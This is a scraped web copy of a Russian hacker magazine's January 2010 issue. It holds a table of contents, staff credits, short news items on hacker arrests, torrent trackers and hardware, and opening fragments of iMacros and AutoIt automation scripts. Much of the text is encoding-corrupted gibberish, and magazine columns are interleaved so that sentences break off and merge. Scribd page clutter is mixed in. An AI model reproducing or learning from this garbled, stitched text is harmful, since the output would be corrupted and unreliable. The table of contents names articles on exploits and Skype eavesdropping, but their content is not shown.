âàòåëåé<SP>» Dispatch("imacros") обращаться к COM-объектам, запускать функ-
TAG POS=1 TYPE=INPUT:SUBMIT goalma.orgt("", 1) ции из динамических библиотек (в том числе,
FORM=NAME:LoginForm goalma.orgy("SwitchProxy") API Windows), а также работать с базами
if __name__=='__main__': данных MySQL и SQLite. Короче, прога пре-
Это лишь первые несколько строчек полу- Hello() вратилась в настоящий язык программиро-
чившегося скрипта. Теперь я просто выби- вания с упором на автоматизацию различных
раю макрос «Билет Москва-Питер» и сразу Но как ни приятно упростить себе жизнь процессов.
перехожу к выбору даты и оплате :). Какие в Сети, гораздо полезнее может оказаться Простой вопрос: что можно автоматизировать
возможности это предоставляет? Огромные! автоматизация действий просто в системе. через AutoIt? Абсолютно все. Для примера
Меня недавно спросили, как автоматически И для этого нужен уже совершенно другой составим скрипт, который будет запускать
собирать Webmoney-бонусы — небольшие инструмент. оснастку Computer Management и через нее
поощрения в WMR/WMZ, которыми раз- создавать локального пользователя. Конечно,
личные ресурсы стимулируют пользователей ÇÀÄÀ×À: то же самое можно (и даже лучше) провернуть
Local Users and Groups&quot; $username = &quot;usertocreate&quot; Run (&#39;cmd /c &quot;goalma.org&quot;&#39;, @ SystemDir, @SW_HIDE) WinWaitActive(&quot;Computer Management&quot;)

ControlTreeView (&quot;Computer Management&quot;, &quot;&quot;, , &quot;Expand&quot;, $treeitem) $treeitem = $treeitem &amp; &quot; user

MAC OS X: УСТАНОВКА НА ОБЫЧНЫЙ КОМП

0 оценок0% нашли этот документ полезным (0 голосов)
3K просмотров страниц

Оригинальное название

Авторское право

© Attribution Non-Commercial (BY-NC)

Доступные форматы

PDF, TXT или читайте онлайн в Scribd

Поделиться этим документом

Поделиться или встроить документ

Этот документ был вам полезен?

0 оценок0% нашли этот документ полезным (0 голосов)
3K просмотров страниц

РЕ
СТР. 20

КО ЦЕ
М НА
ЕН :
ДО
ВА р.
НН
ЯА
LISP ВОЛШЕБНЫЕ
МЕТОДЫ
VS. JAVA
×ÒÎ È ÍÅ ÑÍÈËÎÑÜ
ÍÎÂÛÉ Ê ËÀÑÑ
ÎØÈÁÎÊ
ÐÀÇÐÀÁÎÒ×ÈÊ ÀÌ Â ÑÊÐÈÏÒÀ Õ PHP
JAVA ÑÒÐ. 48
ÑÒÐ.
ПРОСЛУШКА SKYPE

прослушкa СТР. 94

БОРЬБА
СЕТЕВЫЕ С СИНИМ
РЕГУЛИРОВЩИКИ
ÂÛÁÈÐÀÅÌ ÄÈÑÒÐÈÁÓÒÈÂ
ЗМИЕМ
ÏÐÎÔÈËÀÊÒÈÊ À BSOD
ÄËß ÑÎÇÄÀÍÈß ÄËß ÍÀ×ÈÍÀÞÙÅÃÎ
ÐÎÓÒÅÐÀ ÄÐÀÉÂÅÐÎÏÈÑÀÒÅËß

ÑÒÐ. ÑÒÐ. 86


ÐÓÁËÅÉ
ÏÎÄÏÈØÈÑÜ Â ÐÅÄÀÊÖÈÈ
È ÏÎËÓ×ÀÉ ÕÀÊÅÐ
ÏÎ ÂÛÃÎÄÍÎÉ ÖÅÍÅ
ÏÎÄÐÎÁÍÎÑÒÈ ÍÀ ÑÒÐÀÍÈÖÅ
INTRO
Çàöåíè êîðïóñêóëÿðíî-âîëíîâîé äóàëèçì ýòîãî íîìåðà: îí îäíîâðåìåííî ÿâëÿåòñÿ è ÿíâàðñêèì, è
ôåâðàëüñêèì! :) Ïðè÷åì ýòî íèêàêîé íå ñäâîåííûé íîìåð, è Õàêåð êàê âûõîäèë ðàç â ìåñÿö, òàê è ïðîäîëæèò
âûõîäèòü ðàç â ìåñÿö.

 ÷åì ñåêðåò? Ïðîñòî ìû òóò ðàññóäèëè, ÷òî ïîðà ïåðåõîäèòü íà íîâûé ãðàôèê: ÷òîáû z ïîÿâëÿëñÿ â êèîñêàõ
ê íà÷àëó ìåñÿöà, à íå â õ ÷èñëàõ, êàê áûëî ðàíüøå. Ñîáñòâåííî, íà÷èíàÿ ñî ñëåäóþùåãî íîìåðà, òàê è
áóäåò: ìàðòîâñêèé íîìåð âûéäåò â êîíöå ôåâðàëÿ, àïðåëüñêèé — â êîíöå ìàðòà è òàê äàëåå äî êîíöà ýòîãî
ãîäà, êîãäà âûéäåò íîìåð ßíâàðü

Âîò òàêîé òåõíè÷åñêèé ìîìåíò.  îñòàëüíîì âñå ïî-ñòàðîìó: â ýòîì íîìåðå òåáÿ æäåò êó÷à íîâûõ êîíöåïòîâ
âçëîìà è çàùèòû, èíòåðåñíûõ îáçîðîâ, èäåé, òðþêîâ è ñîâåòîâ.

Ïðèÿòíîãî ÷òåíèÿ!

nikitozz, ãë. ðåä.


z

[email protected]
Content
MegaNews ÃÎÂÎÐßÙÈÉ ÏÈÍÃÂÈÍ
Учим Linux говорить и слушать

Все новое за последний месяц

Кодинг
Ferrum ÁÎÐÜÁÀ Ñ ÑÈÍÈÌ ÇÌÈÅÌ
Краткий мануал по профилактике
ÃÎÍÊÈ ÍÀ «ÊÀÌÍßÕ» BSOD для начинающего драйверописателя
Сравнительное тестирование процессоров различной
архитектуры от Intel и AMD ÐÎÁÎÒ ÄËß GOOGLE WAVE
Напишем его на Python’е!

PC_ZONE ÏÎÄÑËÓØÈÂÀÅÌ SKYPE


Хакерский подход к резервному
копированию VoIP-разговоров
×ÒÎ ÍÀÌ ÑÒÎÈÒ MAC ÏÎÑÒÐÎÈÒÜ?
Устанавливаем МакОС на обычный компьютер ][-HOLYWAR: LISP VS. JAVA
Common Lisp: простота и мощь
9 ÑÊÀÍÅÐÎÂ ÁÅÇÎÏÀÑÍÎÑÒÈ промышленного стандарта
Лучшие инструменты для пентестера
ÊÎÄÅÐÑÊÈÅ ÒÈÏÑÛ È ÒÐÈÊÑÛ
ÑÅÊÐÅÒÛ ÀÂÒÎÌÀÒÈÇÀÖÈÈН Три правила кодинга на C++
Несколько примеров того, как облегчить себе жизнь для настоящих спецов

ÊÎÄÈÍÃ ÄËß MAEMO 5


Пишем Bluetooth-сканнер для Nokia N

SYN/ACK
Взлом ÎÄÍÈÌ ÌÀÕÎÌ
Централизованное развертывание Windows 7
EASY-HACK при помощи SCCM SP2
Хакерские секреты простых вещей
ÑÈÌÁÈÎÒÈ×ÅÑÊÀß ÑÂßÇÜ
ÎÁÇÎÐ ÝÊÑÏËÎÈÒÎÂ Настраиваем связку SharePoint ,
Анализ свеженьких уязвимостей Exchange Server и Active Directory

PHP È ÂÎËØÅÁÍÛÅ ÌÅÒÎÄÛ ÑÅÒÅÂÛÅ ÐÅÃÓËÈÐÎÂÙÈÊÈ


Сериализация PHP-объектов глазами хакера Обзор популярных дистрибутивов-роутеров

ÝÊÑÏËÎÈÒ «ÍÀ ÊÎËÅÍÊÅ» IN DA FOCUS


Пишем эксплойт подручными средствами Обзор серверных железок

ÑÂÎÉ ÃÈÏÅÐÂÈÇÎÐ ÁËÈÆÅ Ê ÒÅËÓ! ÎÑÒÀÒÜÑß ÍÀ ÏËÀÂÓ


Аппаратная виртуализация на практике Обвески для Web-сервера,
без которых не обойтись
ÂÇËÎÌ ÂÑÅß ÑÅÒÈ
Omnis — самый лучший хостинг!

X-TOOLS
Программы для взлома
Юниты
PSYCHO
Сцена Уязвимые личности:руководство
по эксплуатации

ÃÐÅÃ ÕÎÃËÀÍÄ FAQ UNITED


Хакер, писатель, геймер Большой FAQ

ÄÈÑÊÎ
Юниксойд
Гб всякой всячины

WWW2
Удобные web-сервисы
×ÅÐÒÅÍÎÊ ÈÇ ÒÀÁÀÊÅÐÊÈ
Детальный обзор FreeBSD

APT È ÂÑÅ, ÂÑÅ, ÂÑÅ


Изучаем возможности менеджера пакетов APT
и сопутствующих программ
ÎÑ 01 ÎÑ 02 ÎÑ 03
ÎÑ 04 ÎÑ 05


/ÐÅÄÀÊÖÈЯ Антон «Ant» Жуков >Менеджеры , Ìîñêâà,
>Ãëàâíûé ðåäàêòîð >Монтаж видео Ольга Емельянцева Ãëàâïî÷òàìò, à/ÿ , Õàêåð
Íèêèòà «nikitozz» Êèñëèöèí Максим Трубицын Мария Нестерова Çàðåãèñòðèðîâàíî â Ìèíèñòåðñòâå
([email protected]) Мария Николаенко Ðîññèéñêîé Ôåäåðàöèè ïî äåëàì ïå÷àòè,
>Âûïóñêàþùèé ðåäàêòîð /PUBLISHING Максим Соболев òåëåðàäèîâåùàíèþ è ñðåäñòâàì ìàññîâûõ
Николай«gorl»Андреев Надежда Гончарова êîììóíèêàöèé ÏÈ ß îò 14
([email protected]) >Ó÷ðåäèòåëü Наталья Мистюкова ôåâðàëÿ ã.
>Ðåäàêòîðû ðóáðèê ÎÎÎ «Ãåéì Ëýíä» >Администратор Îòïå÷àòàíî â òèïîãðàôèè
ÂÇËÎÌ , Москва, ул. Тимура Фрунзе, Мария Бушева «Lietuvas Rivas», Литва.
Дмитрий«Forb» Докучаев д. 11, стр. >Работа с рекламными агентствами Òèðàæ ýêçåìïëÿðîâ.
([email protected]) Тел.: +7 () Лидия Стрекнева ([email protected]) Öåíà äîãîâîðíàÿ.
PC_ZONE и UNITS Факс: +7 () >Старший менеджер Ìíåíèå ðåäàêöèè íå îáÿçàòåëüíî
Степан «step» Ильин >Генеральный дèðåêòîð Светлана Пинчук ñîâïàäàåò ñ ìíåíèåì àâòîðîâ. Ðåäàêöèÿ
([email protected]) Äìèòðèé Àãàðóíîâ >Старший трафик-менеджер óâåäîìëÿåò: âñå ìàòåðèàëû â íîìåðå
UNIXOID, SYN\ACK и PSYCHO >Óïðàâëÿþùèé äèðåêòîð Марья Алексеева ïðåäîñòàâëÿþòñÿ êàê èíôîðìàöèÿ ê
Àíäðåé «Andrushock» Ìàòâååâ Äàâèä Øîñòàê ðàçìûøëåíèþ. Ëèöà, èñïîëüçóþùèå
([email protected]) >Äèðåêòîð ïî ðàçâèòèþ
/ÎÏÒÎÂÀЯ ÏÐÎÄÀÆÀ äàííóþ èíôîðìàöèþ â ïðîòèâîçàêîííûõ
ÊÎÄÈÍà >Äèðåêòîð îòäåëà öåëÿõ, ìîãóò áûòü ïðèâëå÷åíû ê
Ïàøà Ðîìàíîâñêèé
Александр «Dr. Klouniz» Лозовский äèñòðèáóöèè îòâåòñòâåííîñòè. Ðåäàêöèÿ â ýòèõ ñëó÷àÿõ
>Äèðåêòîð ïî ïåðñîíàëó
([email protected]) Àíäðåé Ñòåïàíîâ îòâåòñòâåííîñòè íå íåñåò.
Татьяна Гудебская
ФРИКИНГ >Ôèíàíñîâûé äèðåêòîð
([email protected]) Ðåäàêöèÿ íå íåñåò îòâåòñòâåííîñòè çà
Сергей Долин >Руководитель московского ñîäåðæàíèå ðåêëàìíûõ îáúÿâëåíèé â
Анастасия Леонова
>Ëèòåðàòóðíûй ðåäàêòîð направления íîìåðå. Çà ïåðåïå÷àòêó íàøèõ ìàòåðèàëîâ
>Редакционный директор
Дмитрий Лященко Дмитрий Ладыженский
Ольга Девальд áåç ñïðîñà — ïðåñëåäóåì.
([email protected]) >PR-менеджер
([email protected]) По вопросам лицензирования и получения
>Руководитель регионального прав на использование редакционных ма-
Наталья Литвиновская
/ART >Директор по маркетингу
направления териалов журнала обращайтесь по адресу:
>Àðò-äèðåêòîð Òàòüÿíà Êîøåëåâà [email protected]
Дмитрий Плющев
Евгений Новиков >Главный дизайнер
([email protected] ) В октябрьский номер за год вкралась
([email protected]) >Руководитель отдела подписки досадная опечатка. Автором статьи
Энди Тернбулл
>Верстальщик Марина Гончарова «Рожденные мультимедиа революцией»
>Директор по производству
Вера Светлых Сергей Кучерявый
([email protected]) является Юрий «bober» Раззоренов (zloy.
([email protected]) òåë.: () [email protected]), а не Юрий Видинеев.
/DVD /ÐÅÊËÀÌÀ ôàêñ: () Редакция приносит свои извинения за эту
>Выпускающий редактор / Тел.: () , факс: () > Ãîðячая ëèíèя ïî ïîäïèñêå ошибку.
Степан «Step» Ильин >Директор группы GAMES & DIGITAL òåë.: 8 () © ÎÎÎ «Ãåéì Ëýíä», РФ,
([email protected]) Евгения Горячева ([email protected]) Áåñïëàòíî äëÿ çâîíÿùèõ èç Ðîññèè
>Редактор Unix-раздела > Äëя писем
MEGANEWS МАРИЯ «MIFRILL» НЕФЕДОВА [email protected]

MEGANEWS
ÎÁÎ ÂÑÅÌ ÇÀ ÏÎÑ ËÅÄÍÈÉ ÌÅÑßÖ

3G-ÒÅËÅÔÎÍÛ ÎÒ ÌÒÑ

ÂÅÍÄÅÒÒÀ Ñ ÏÐÎÂÀÉÄÅÐÎÌ
В Бельгии властям удалось вычислить еще паролей, подтвердив, что он
и поймать хакера-шантажиста, скры- не блефует. Слив, правда, был зарезан
вавшегося под ником Vendetta. Этот на корню модераторами форума, где
товарищ нашел некую дырку в системе Vendetta выкладывал пароли — они
безопасности крупнейшего провайде- почти сразу удалили криминальный
ра страны — Belgacom, и угрожал опуб- мессаг. В итоге, Belgacom проблему
ликовать в сети тыс. паролей его все же признал, но не совсем так,
юзеров. Выложив первые 30 паролей в как хотелось бы хакеру — провайдер
широкий доступ, хакер выдвинул всего обратился в органы, прямиком в бель-
одно, очень простое требование — гийский аналог нашего «отдела «К».
он хотел, чтобы Belgacom предоставил Киберполицейские сработали весьма
своим пользователям нормальный оперативно — поимка Vendetta заняла
безлимитный тариф. Дело в том, что чуть более месяца. Шантажистом
пров установил жесткие лимиты на ска- оказался летний студент факультета
чивание — от 4 до 60 гигабайт в месяц информационных технологий. Теперь
и никакого анлима. Когда провайдер борцу за безлимит грозит до трех лет
никак не отреагировал на этот выпад, тюрьмы.
борец за справедливость слил в сеть

Крупнейший оператор сотовой связи в России и стра-


нах СНГ объявил о расширении собственной бренди-
рованной линейки телефонов и представил первые в
линейке модели, поддерживающие стандарт 3G — МТС
и МТС Новые трубки, разработанные компа- ÊÎÌÏÀÍÈß EZTV ÐÅØÈËÀ ÂÛßÂÈÒÜ ÑÀÌÛÉ
нией Huawei для оператора Vodafone, поставляются на
российский рынок под брендом МТС в рамках страте- ÏÎÏÓËßÐÍÛÉ ÒÎÐÐÅÍÒ-ÊËÈÅÍÒ,
гического партнерства двух операторов. Они логично
продолжают линейку собственных брендированных È ÎÊÀÇÀËÎÑÜ, ×ÒÎ ÝÒÎ ÂÎÂÑÅ ÍÅ UTORRENT,
ÍÀÁÐÀÂØÈÉ %, À XUNLEI, ×ÅÉ
телефонов МТС, запущенную в сентябре , с выхо-
дом аппарата МТС Ожидается, что новые аппараты

ÐÅÇÓËÜÒÀÒ — %. ÌÍÎÃÎÅ ÎÁÚßÑÍßÅÒ


станут одними из наиболее доступных на российском
рынке моделей 3G-телефонов. й ориентирован на
молодежный сегмент рынка, а й на бизнесменов.
На трубки распространяется трехлетняя гарантия: ÒÎÒ ÔÀÊÒ, ×ÒÎ XUNLEI — ÊÈÒÀÉÑÊÈÉ
один год — для любого владельца телефонов, и допол-
нительно два года — для абонентов МТС. ÊËÈÅÍÒ.
XÀÊÅÐ 01 // 10
MEGANEWS

PC27

ÕÀÊ ÕÀÊÓ ÐÎÇÍÜ


Как известно, исключения подтверждают правило, и клип на песню «Never Gonna Give You Up». Так что
хакеров это тоже касается — иногда хаки и малварь фотка Эстли намекала владельцу зараженного
действительно приносят своим авторам не много- телефона, что его отрикроллили :). Таунс утверждает,
миллионные штрафы и долгие годы тюрьмы, а славу что написанием вируса он хотел обратить внимание
мирскую и приглашения на престижную работу. общественности на изъяны в ОС и на ее уязвимость.
Именно так произошло с летним австралийцем Что ж, ему это удалось, ведь Ikee стал точкой отсчета
Эшли Таунсом, который написал первый вирус для для других вирусмэйкеров — на его основе были
iPhone. Детище Таунса называлось Ikee и поражало написаны уже совсем не смешные вещи, например,
только нелегально разлоченные смартфоны Apple. вирь, недавно поразивший клиентов сетевого банка
В целом червь был безвреден, он просто менял ING. Однако Таунс за свои проделки с фоткой Эстли
стандартную заставку iPhone на фото певца Рика никакого наказания не понес, а теперь его и вовсе
Эстли. Если ты вдруг не в курсе — Эстли еще в е пригласили на работу в фирму, разрабатывающую
годы исполнил песню «Never Gonna Give You Up», легальные приложения для iPhone. Многие IT-де-
которая в году породила в сети мем рикроллин- ятели уже высказались относительно этого события
га (rickrolling). Работает рикроллинг просто — тебе в негативном ключе, считая, что вознаграждать
присылают ссылку на YouTube, якобы на что-то человека за нелицеприятные поступки, в которых он
интересное, а, пройдя по линку, ты обнаруживаешь даже не раскаивается, неправильно.

ÏÀÐÀ ÑËÎÂ Î ÏÎËÜÇÅ ÁÝÊÀÏÎÂ


3-го декабря сайт газеты «Московский ны, потому как про бэкапы в МК, видимо, не
комсомолец» оказался в буквальном смыс- слышали или считают, что это «от Лукавого».
ле уничтожен хакерской атакой, которая, по Зато в МК полагают, что взлом был делом рук
словам главного редактора МК Павла Гусева, какой-то хакерской организации или даже
длилась всего 10 минут. На самом деле, атака спецслужб. Представители газеты сообщили,
Ó×ÅÍÛÅ длилась, конечно, дольше, а упомянутые 10 что отследить атаковавших удалось, но, судя
минут потребовались непосредственно на по всему, лишь частично — в МК уверяют, что
ÊÀËÈÔÎÐÍÈÉÑÊÎÃÎ стирание данных. Аннигиляции подверглось взлом произвели из Южной Кореи. Это наводит
все — от баз данных до фото- и видеоархи- на мысли, что корейские спецслужбы вряд ли
ÓÍÈÂÅÐÑÈÒÅÒÀ ва газеты. Хак произошел ровно за день до интересуются «Московским комсомольцем»,
запуска новой версии сайта и за неделю до а хакеры, скорее всего, просто хорошо замели
ÏÎÄÑ×ÈÒÀËÈ, ×ÒÎ летия Издательского дома «Московский следы. Если, конечно, хакеры вообще были, и
комсомолец». Самое поразительное во всей сайт не почил с миром по вине, скажем, убор-
ÑÐÅÄÍÈÉ ÀÌÅÐÈÊÀÍÅÖ этой истории, что в результате взлома фото- и щицы, неудачно опрокинувшей ведро.
видеоархив оказались безвозвратно утеря-
ÏÎÒÐÅÁËßÅÒ ÏÎÐßÄÊÀ
34 ÃÁ ÄÀÍÍÛÕ Â ÄÅÍÜ. ÊÐÓÃÎÂÎÐÎÒ ÒÐÅÊÅÐÎÂ Â ÏÐÈÐÎÄÅ
Вокруг крупных торрент-трекеров в последнее время бушуют
нешуточные страсти, но некоторые события выбиваются
даже из уже ставшей привычной череды судов и скандалов. С
прискорбием сообщаем, что популярнейший трекер Mininova
(goalma.org) приказал долго жить. Команда уже давно шла на
всяческие уступки по отношению к копирастам, то есть, неле-
гальный контент исчезал с трекера по первому же требованию
правообладателей. Что ж, теперь контента не будет вообще.
Проиграв очередное судебное разбирательство, коллектив
Mininova был вынужден исполнить указание суда, а именно
— закрыть трекер для свободной загрузки торрентов, а затем
провести глобальную зачистку, удалив все раздачи. Отныне
трекер работает только с системой Content Distribution, то
есть на нем раздается контент, выложенный собственноручно
его создателями. Но, как водится, где плохая новость, там и
хорошая. Не работавший с сентября месяца трекер Demonoid
вернулся в строй! Трекер возродился с базами от 11 сентября
года, то есть, фактически не понеся никаких потерь. Про-
блем с авторизацией у старых юзеров также не наблюдается,
а регистрация по-прежнему доступна только по инвайтам.
«Демонойду» пора менять логотип на птицу феникс :).

XÀÊÅÐ 01 // 10


Реклама
MEGANEWS

PC27 J3

ÃÐÀÔÈ×ÅÑÊÈÅ ÌÎÙÍÎÑÒÈ ÎÒ SAPPHIRE


Компания Sapphire представила новинку в ным дизайном, а также работает не в пример
линейке Vapor-X — свою вариацию 3-D карты тише. Sapphire HD оснащена пото-
Radeon HD Напомним, что фишкой ковыми процессорами, битной шиной
линейки является применение кулеров с памяти и 1 Гб памяти GDDR5. Из разъемов
испарительной камерой в основании. Судя наличествуют 2 DVI порта, HDMI и DisplayPort,
по всему, эта конструкция себя оправдывает, плюс карта поддерживает DirectX11, ATI
ведь в Sapphire с гордостью сообщают, что Eyefinity и режим CrossFireX. В онлайн-мага-
их кулер справляется с охлаждением на 9 зинах цена на девайс колеблется между
градусов лучше по сравнению с референс- евро.

ÀÍÀËÈÒÈÊÈ ÈÇ RESEARCH AND MARKETS ÏÐÅÄÐÅÊÀÞÒ,


×ÒÎ Ê ÃÎÄÓ ÏÐÎÄÀÆÈ ÏÊ ÂÎÇÜÌÓÒ ÎÒÌÅÒÊÓ
3 ÌËÐÄ. ØÒÓÊ Â ÃÎÄ. ÂÅËÈÊÈÉ ÌÀÃÍÈÒ THE
PIRATE BAY
В конце ноября половина интер- технологии DHT и расширения
нета, наверняка, едва не зарабо- битторент-протокола PEX, кото-
тала инфаркт, увидев заголовки рые позволят юзерам загружать
новостных лент, пестрящие па- файлы напрямую друг у друга, без
ническими криками: «Пиратская участия трекера. Заявив в блоге,
бухта наконец-то закрывается!». что «трекер больше не нужен»,
Но, как выяснилось, никаких при- создатели TPB изменили архи-
чин для паники не было, а команда тектуру ресурса, закрыв tracker.
TPB лишь предприняла очеред- goalma.org и перейдя на
ной логичный и изящный шаг. magnet-ссылки. Теперь принцип
Администрация трекера работы TPB стал похож на,
долго ломала голову над тем, скажем, DC++ и другие файло-
как перевести торренты «на обменные проги. Как лаконично
следующий уровень», и пока замечают сами админы: «Это
решила остановиться на связке будущее. И уже настоящее».

ÍÅ ÑÌÎÒÐÅÒÜ, ÍÅ ÑËÓØÀÒÜ, ÍÅ ÊÀ×ÀÒÜ


Правообладатели, похоже, не знают, до чего бы еще добраться и что бы кто-то посмел загрузить нелегальную копию некоего фильма. Конкретный
такое закрыть, поэтому от их рук все чаще страдают совсем не «средо- «виновник торжества» так же не был найден — сетка была бесплатной и
точия зла», а случайные люди и организации. На этот раз «отличилась» открытой, и пользовались ей не только чиновники, но и простые горожа-
Американская ассоциация кинокомпаний (МРАА), принудившая власти не. Но теперь городок остался без удобной Wi-Fi сети — дело в том, что на
маленького городка Кошоктон в штате Огайо отключить их муници- поднятие системы фильтрации контента у властей города нет средств, а
пальную Wi-Fi сетку с доступом в интернет. Что за страшный контрафакт после требования МРАА, местный провайдер сразу же остановил работу
скачивали или распространяли с ее помощью, неизвестно, сообщается муниципального сервиса, дабы избежать суда и штрафов с большим
лишь, что Sony Pictures Entertainment обнаружила, что в Кошоктоне количеством нулей после запятой.

XÀÊÅÐ 01 // 10



MEGANEWS

×ÓÄÅÑÀ ÌÈÍÈÀÒÞÐÈÇÀÖÈÈ
Компания VIA представила широкой публике материнскую плату рекордного размера —
всего 6 х 6 см. Новый форм-фактор в компании назвали Mobile-ITX. Это, казалось бы,
здорово и новость — лишний повод порадоваться достижениям прогресса, но не все так
просто. На деле хитрецы из VIA, фактически, разделили обычную материнскую плату на
две части, представив меньшую как «новый форм-фактор», а вторую часть, которая, кстати,
больше примерно в раза, назвали «дополнительной платой ввода-вывода». Очень
тонкая ирония, учитывая, что на «дополнительной» плате расположилась и батарейка, и
часть контроллеров портов, и другие «ненужные» вещи :). На меньшей же части девайса
уместились процессор C7M тактовой частотой 1 ГГц и Мб DDRII /MHz SDRAM.
Энергопотребление малютки составляет не более 12 Вт, и пассивного охлаждения плате
вполне хватает. Справедливости ради все же отметим, что размер платы ввода-вывода
может варьироваться в зависимости от ее конфигурации, так что определенной степени
миниатюрности VIA, конечно, действительно достигли.

 MCAFEE ÏÐÎÂÅËÈ Î×ÅÐÅÄÍÎÅ ÈÑÑËÅÄÎÂÀÍÈÅ, ÍÀ ÝÒÎÒ ÐÀÇ ÍÀÇÂÀ ÑÀÌÛÅ


ÎÏÀÑÍÛÅ ÄÎÌÅÍÛ Â ÑÅÒÈ. ËÈÄÈÐÓÞÙÈÅ ÏÎÇÈÖÈÈ ÀÍÒÈ-ÒÎÏÀ ÇÀÍÈÌÀÞÒ
ÊÀÌÅÐÓÍ (.CM), ÃÎÍÊÎÍÃ (.HK), ÊÍÐ (.CN) È ÑÀÌÎÀ (.WS). ÇÎÍÛ .SU È .RU ÒÎÆÅ
ÂÎØËÈ Â ÄÅÑßÒÊÓ ÍÀÈÁÎËÅÅ ÎÏÀÑÍÛÕ.

GOOGLE DNS
Пожалуй, сейчас стало проще сказать, каких посему мы расскажем только о том, что Google сений Google заверяет, что не будет записывать
сервисов пока нет у компании Google, чем запустил сервис Public DNS. Собственный никакую частную информацию пользователей,
перечислить уже существующие. Но «Гуглу» DNS-сервис поискового гиганта призван по- а IP-адреса не станет хранить дольше пары
все мало — компания продолжает поставлять высить скорость загрузки сайтов и обеспечить дней. Информация о провайдере и местона-
нововведения с такой скоростью и в таких большую безопасность юзеров. Чтобы подклю- хождении пользователя так же не задержится в
объемах, что для адекватного их описания нам читься к нему, достаточно прописать первич- базах дольше недель. Верить Google или
потребовалась бы отдельная рубрика, никак ным и вторичным DNS адреса и В нет, решать тебе.
не меньше. Однако гугло-рубрики у нас нет, ответ на резонную волну параноидальных опа-

ÎÄÈÍ ÝÊÐÀÍ ÕÎÐÎØÎ, Кого сегодня удивишь ноутбуком? Верно — никого, ведь

À ÄÂÀ ËÓ×ØÅ каких только вариаций лаптопов ни придумали: крохотные


нетбуки; большие, мощные ноуты, способные заменить
собой серьезный десктоп; гибриды лаптопов с планшетны-
ми ПК и т.д., и т.п. Но если тебе при всем богатстве выбора
хочется чего-то оригинального, то, возможно, машинка от
японской компании Kohjinsha придется по душе. Ноут серии
DZ (DZ6KHE16E) имеет одну интересную фишку — он осна-
щен сразу двумя дюймовыми экранами с разрешением
x каждый. Экраны расположены таким образом,
что по желанию можно разложить или сразу оба, образовав
огромную рабочую область, или же, если нужна компакт-
ность, можно довольствоваться сложенным вариантом и его
ю дюймами. В остальном конфигурация машины такова:
процессор Athlon Neo MV ГГц, от 1 до 4 Гб памяти
DDR2, графический процессор ATI Radeon HD и жесткий
диск на Гб. В комплекте имеются адаптер Wi-Fi IEEE
b/g/n, Bluetooth ver + EDR, 3 USB-порта, кардридер
«3-в-1» и веб-камера на МП. Цена ноутбука в японских
интернет-магазинах равна примерно $, плюс расходы
на пересылку до России.

XÀÊÅÐ 01 // 10


11
MEGANEWS

ÍÎÂÎÅ ÏÐÅÑÌÛÊÀÞÙÅÅÑß ÎÒ RAZER


Компания Razer, чьи клавиатуры, мыши и акустика хорошо
знакомы геймерам и не только, представила пополнение в
семействе «грызунов». Согласно традиции все клавиатуры
Razer носят имена пауков, акустика — имена рыб, а мыши
называют в честь змей, так что новинка получила имя Razer
Imperator (императорский удав). Новая мышь выполне-
на с упором на эргономику, но заточена, увы, только под
правшей. Зато правши должны порадоваться — у Imperator
появилась возможность регулировки положения боковых
кнопок, что позволяет подстроить девайс точно под размер
своей руки и даже под манер захвата мыши. Лазерный сен-
сор Razer Precision G обеспечит разрешение до dpi,
а традиционные для продуктов Razer функция On-The-Fly
Sensitivity (настройка чувствительности на лету) и бесшум-
ные тефлоновые ножки Ultraslick гарантируют удобство и
точность движений. Цена новинки составит $

 ÕÎÄÅ ÈÑÑËÅÄÎÂÀÍÈß
ÊÎÌÏÀÍÈÅÉ «ÊÎÌÊÎÍ»
ÁÛËÎ ÂÛßÂËÅÍÎ: ÓÐÎÂÅÍÜ
ÏÈÐÀÒÑÒÂÀ ÑÐÅÄÈ ÄÎÌÀØÍÈÕ
ÀÍÒÈÂÈÐÓÑΠÑÎÑÒÀÂËßÅÒ
70%.
ÊÈÁÎÐÃÈ ÈÄÓÒ
Как же был прав Уильям Гибсон, сказавший: правляющие прямо в мозг, через оптические
«будущее уже здесь, просто оно пока не очень нервы, сигнал со специальных очков, в которые
широко распространено». Ярким и живым до- встроена камера. Операция по имплантации
казательством этого изречения стал летний датчиков заняла 4 часа, затем еще 2 месяца
британец Питер Лэйн, потерявший зрение потребовалось на заживление глаза и вот — к
более 30 лет назад, а теперь вновь обретший Лэйну начало возвращаться зрение. Теперь он
его, благодаря бионическому глазу. Лэйн стал может не только различать очертания объектов
одним из первых в мире людей, кому в глаз вокруг себя, но даже читать текст со специаль-
имплантировали электронные датчики, стиму- ного экрана. Помимо Лэйна новую технологию
лирующие оставшиеся нервы сетчатки и пере- уже испытывают на себе еще 32 добровольца.

ÏÎÈÑÊÎÂÛÅ ÀËÜßÍÑÛ
Сразу ряд интересных сообщений поступил из стана крупных поисковых компаний.
Например, стало известно, что компании goalma.org и Google заключили соглашение о со-
трудничестве, согласно которому с января goalma.org начнет использование поисковых
технологий Google и разместит у себя рекламные блоки AdSense. О своих поисковых
технологиях goalma.org, впрочем, забывать тоже не собирается, планируя развивать их не
менее активно.
И, почти одновременно с первым сообщением, было объявлено о начале сотрудничества
между компанией «Яндекс» и goalma.org — поисковиком компании Microsoft. В частности,
для российской аудитории goalma.org разместил у себя рекламу с сервиса «goalma.org-
рект». Согласно официальным комментариям представителей «Яндекса», размещение
рекламы на goalma.org показало высокую эффективность и себя оправдало. Ограничатся
ли компании одной только рекламой, покажет время, а пока все происходящее очень
напоминает крылатую фразу «против кого дружить будем» :).

XÀÊÅÐ 01 // 10



13
Реклама
MEGANEWS

ÐÀÑÏÎÇÍÀÂÀÍÈÅ
ÎÁÐÀÇÎÂ
И еще немного о Google. Недавно широкой
публике была представлена очень интересная
программа для платформы Andriod — Google
Goggles. С помощью этой занимательной проги,
поиск в Сети стало возможно осуществлять не
через поисковые запросы, а просто используя
камеру своего телефона. Практически как в
фантастических книгах и фильмах — наводишь
мобильник на интересующий тебя предмет,
фотографируешь его, и сервис рассказывает
тебе, что это такое. На текущий момент Google
Goggles распознает самые разные книги, диски,
достопримечательности, магазины, рестораны,
кафе и даже разбирается в марках вин. В качест-
ве приятного бонуса прога умеет читать визитки.
Интересно, как скоро можно будет сфотогра-
фировать человека на мобильник и получить
информацию о нем? :)
Другой интересный факт относительно
платформы Android — на днях Сергей Брин
заявил, что в будущем компания планирует
слить Android и Chrome OS воедино, взяв
из каждой ОСи только лучшее и создав
своего рода идеал. Учитывая, что первые
девайсы с Chrome OS на борту появятся
только к концу года, это далеко иду-
щие планы.
ФБР США ÑÎÎÁÙÀÅÒ, ×ÒÎ ÌÎØÅÍÍÈÊÈ,
